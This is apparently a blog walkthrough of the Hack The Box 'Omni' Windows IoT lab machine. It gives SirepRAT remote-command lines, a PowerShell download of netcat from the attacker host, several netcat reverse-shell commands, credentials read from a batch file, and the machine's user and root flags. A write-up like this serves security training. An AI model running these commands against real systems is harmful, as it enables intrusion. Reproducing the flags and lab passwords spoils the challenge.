Hack-The-Box-walkthrough[omni]

Posted on Edited on In Views: Word count in article: 1.1k Reading time ≈ 4 mins.

introduce

OS: Other
Difficulty: Easy
Points: 20
Release: 22 Aug 2020
IP: 10.10.10.204

User Blood snowscan 00 days, 01 hours, 21 mins, 02 seconds.
Root Blood snowscan 00 days, 02 hours, 01 mins, 30 seconds.

  • my htb rank

information gathering

first use nmap as usaul

1
2
3
4
5
6
7
8
9
10
11
12
13
14
root@kali:~# nmap -sV -p- -v --min-rate=10000 10.10.10.204
PORT      STATE SERVICE  VERSION
135/tcp   open  msrpc    Microsoft Windows RPC
5985/tcp  open  upnp     Microsoft IIS httpd
8080/tcp  open  upnp     Microsoft IIS httpd
29817/tcp open  unknown
29819/tcp open  arcserve ARCserve Discovery
29820/tcp open  unknown
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port29820-TCP:V=7.80%I=7%D=8/27%Time=5F4865C5%P=x86_64-pc-linux-gnu%r(N
SF:ULL,10,"\*LY\xa5\xfb`\x04G\xa9m\x1c\xc9}\xc8O\x12")%r(GenericLines,10,"
SF:\*LY\xa5\xfb`\x04G\xa9m\x1c\xc9}\xc8O\x12")%r(Help,10,"\*LY\xa5\xfb`\x0
SF:4G\xa9m\x1c\xc9}\xc8O\x12");
Service Info: Host: PING; OS: Windows; CPE: cpe:/o:microsoft:windows

access port 8080,it needs a Login ID:Password

from “Windows Device Portal” we know this Box is an IOT box,we can use help of SafeBreach-Lab’s SirepRAT

SirepRAT has a functionality which lets us run Arbitrary Program. That means we could run cmd.exe and call in powershell and download a file via the Invoke-WebRequest cmdlet.

download SirepRAT

Download Windows Netcat-Binary-64-bit

Extract it and start SimpleHTTPServer on the same directory. 

1
2
3
4
5
C:\Users\Administrator\Desktop\hack the box靶机渗透\doing\machine\Omni>python -m SimpleHTTPServer 82
Serving HTTP on 0.0.0.0 port 82 ...
10.10.14.15 - - [28/Aug/2020 10:58:17] "GET / HTTP/1.1" 200 -
10.10.14.15 - - [28/Aug/2020 10:58:17] code 404, message File not found
10.10.14.15 - - [28/Aug/2020 10:58:17] "GET /favicon.ico HTTP/1.1" 404 -

now run SirepRAT. Get inside SirepRAT directory and run

1
2
D:\pentesttool\SirepRAT-master\SirepRAT-master>python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args "/c powershell Invoke-Webrequest -OutFile C:\\Windows\\System32\\spool\\drivers\\color\\nc64.exe -Uri http://10.10.14.15:82/nc64.exe" --v
<HResultResult | type: 1, payload length: 4, HResult: 0x0>

we see successfully downloaded nc64.exe

1
2
3
4
5
6
C:\Users\Administrator\Desktop\hack the box靶机渗透\doing\machine\Omni>python -m SimpleHTTPServer 82
Serving HTTP on 0.0.0.0 port 82 ...
10.10.14.15 - - [28/Aug/2020 10:58:17] "GET / HTTP/1.1" 200 -
10.10.14.15 - - [28/Aug/2020 10:58:17] code 404, message File not found
10.10.14.15 - - [28/Aug/2020 10:58:17] "GET /favicon.ico HTTP/1.1" 404 -
10.10.10.204 - - [28/Aug/2020 11:01:04] "GET /nc64.exe HTTP/1.1" 200 -

Now get Netcat listener ready.

1
2
C:\Users\Administrator\Desktop\hack the box靶机渗透\doing\machine\Omni>nc64.exe -lvp 1234
listening on [any] 1234 ...

Now execute Netcat on the box. 

1
2
D:\pentesttool\SirepRAT-master\SirepRAT-master>python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args "/c C:\\Windows\\System32\\spool\\drivers\\color\\nc64.exe 10.10.14.15 1234 -e powershell.exe" --v
<HResultResult | type: 1, payload length: 4, HResult: 0x0>

successfully excecute this script, if failed please try it multi times

and we get a shell back

1
2
3
4
5
6
7
8
9
10
11
12
13
C:\Users\Administrator\Desktop\hack the box靶机渗透\doing\machine\Omni>nc64.exe -lvp 1234
listening on [any] 1234 ...
10.10.10.204: inverse host lookup failed: h_errno 11004: NO_DATA
connect to [10.10.14.15] from (UNKNOWN) [10.10.10.204] 49671: NO_DATA
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\windows\system32> pwd
pwd

Path
----
C:\windows\system32

an’t use whoami, but we could use $env:UserName to know the Username. 

1
2
3
PS C:\windows\system32> $env:UserName
$env:UserName
omni$

User Omni and it has no rights to read in user.txt neither root.txt. Thus we need to enumerate further.

After further Enumeration we got in a directory. 

1
2
3
4
5
6
7
8
9
10
11
12
13
PS C:\windows\system32> cd "c:\Program Files\WindowsPowershell\Modules\PackageManagement"
cd "c:\Program Files\WindowsPowershell\Modules\PackageManagement"
PS C:\Program Files\WindowsPowershell\Modules\PackageManagement> ls -force
ls -force


    Directory: C:\Program Files\WindowsPowershell\Modules\PackageManagement


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----       10/26/2018  11:37 PM                1.0.0.1
-a-h--        8/21/2020  12:56 PM            247 r.bat

This directory had a bat file. This bat file has credentials of two user: App and Administrator.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
PS C:\Program Files\WindowsPowershell\Modules\PackageManagement> cat r.bat
cat r.bat
@echo off

:LOOP

for /F "skip=6" %%i in ('net localgroup "administrators"') do net localgroup "administrators" %%i /delete

net user app mesh5143
net user administrator _1nt3rn37ofTh1nGz

ping -n 3 127.0.0.1

cls

GOTO :LOOP

:EXIT

the Webserver running on Port 8080. We could use our credentials there.

jump into chrome. Login via

1
app:mesh5143

Go to Processes > Run Command

Here we could run commands. Lets try to get a reverse shell.
Start a Netcat listener on machine again on different port, and then run this command. 

1
C:\Windows\System32\spool\drivers\color\nc64.exe 10.10.14.15 3344 -e powershell.exe

The website will show “Failed to run the command” but you’d still get your shell.

Let’s look at our Username

1
2
3
PS C:\windows\system32> $env:UserName
$env:UserName
app

We are App.
We can now read user.txt but the contents inside looks to be encrypted.
Lets use this function 

1
2
3
4
5
PS C:\windows\system32> $credential = Import-CliXml -Path U:\Users\app\user.txt
$credential = Import-CliXml -Path U:\Users\app\user.txt
PS C:\windows\system32> $credential.GetNetworkCredential().Password
$credential.GetNetworkCredential().Password
7cfd50f6bc34db3204898f1505ad9d70

and we got user.txt successfully

we found two usernames in r.bat file,use the second one, the Administrator.

1
administrator : _1nt3rn37ofTh1nGz

and repeat the above steps, get a administrator shell

change the port and spawn a shell

1
C:\Windows\System32\spool\drivers\color\nc64.exe 10.10.14.15 3345 -e powershell.exe

now we got root.txt, nice!

1
2
3
4
5
PS C:\windows\system32> $credential = Import-CliXml -Path U:\Users\administrator\root.txt
$credential = Import-CliXml -Path U:\Users\administrator\root.txt
PS C:\windows\system32> $credential.GetNetworkCredential().Password
$credential.GetNetworkCredential().Password
5dbdce5569e2c4708617c0ce6e9bf11d

Summary of knowledge

  • windows iot penetration use SirepRAT
  • spawn nc reverseshell
  • password disclosure
  • windows device portal command excecution
  • powershell command to read and decrypt

Contact me

  • QQ: 1185151867
  • twitter: https://twitter.com/fdlucifer11
  • github: https://github.com/FDlucifer

I’m lUc1f3r11, a ctfer, reverse engineer, ioter, red teamer, coder, gopher, pythoner, AI lover, security reseacher, hacker, bug hunter and more…